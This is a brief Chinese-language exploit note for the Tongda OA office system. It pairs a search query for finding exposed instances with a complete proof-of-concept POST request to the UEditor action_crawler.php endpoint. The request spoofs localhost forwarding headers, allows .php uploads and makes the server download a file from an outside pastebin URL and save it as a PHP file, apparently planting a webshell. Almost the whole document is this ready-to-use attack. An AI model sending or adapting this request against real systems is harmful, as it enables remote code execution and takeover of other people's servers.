漏洞描述
网络资产测绘
app=“TDXK-通达OA”
Poc
POST /module/ueditor/php/action_crawler.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Content-Length: 213
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
CONFIG[catcherPathFormat]=/api/zuk8abxcbg&CONFIG[catcherMaxSize]=100000&CONFIG[catcherAllowFiles][]=.php&CONFIG[catcherAllowFiles][]=.ico&CONFIG[catcherFieldName]=file&file[]=https://pastebin.com/raw/0DuNGn7n#.php